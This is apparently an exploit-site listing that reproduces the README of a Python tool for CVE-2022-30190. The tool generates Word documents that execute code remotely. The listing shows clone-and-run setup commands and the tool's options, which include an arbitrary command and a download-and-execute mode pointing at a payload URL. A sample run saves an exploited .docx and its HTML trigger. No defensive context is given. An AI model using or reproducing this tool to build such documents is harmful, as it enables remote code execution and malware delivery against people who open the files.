Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft CVE-2022-30190

## https://sploitus.com/exploit?id=F8ECE1BA-CC33-5566-B57C-1AB243A48E28
# CVE-2022-30190 - Microsoft Support Diagnostic Tool

## About

This script will attempt to create a Microsoft Office document which will remotely execute code.

## Setup

```
git clone https://github.com/joshuavanderpoll/CVE-2022-30190.git
cd CVE-2022-30190
python3 CVE-2022-30190.py --help
```

## Options
```
usage: CVE-2022-30190.py [-h] [--html HTML] [--cmd CMD] [--downexec]
                         [--download_url DOWNLOAD_URL]

Generate CVE-2022-30190 Word documents.

optional arguments:
  -h, --help            show this help message and exit
  --html HTML           URL to online exploit HTML file
  --cmd CMD             Command you want to execute on run
  --downexec            Enable download and execute mode
  --download_url DOWNLOAD_URL
                        Source where to download and execute from
```

## Examples

```
$ python3 CVE-2022-30190.py --doc="Original.docx" --html="http://localhost/Exploit.html" --cmd="start https://github.com/joshuavanderpoll"
[@] Starting CVE-2022-30190 Generator...
[•] Created by https://github.com/joshuavanderpoll
[•] Using Word document: Original.docx
[•] Deflating Word document...
[•] Deflated Word document.
[√] Exploited Word document saved in "./builds/Exploit.docx" (1109 bytes).
[√] Exploit HTML file saved in "./builds/Exploit.html" (4241 bytes).
```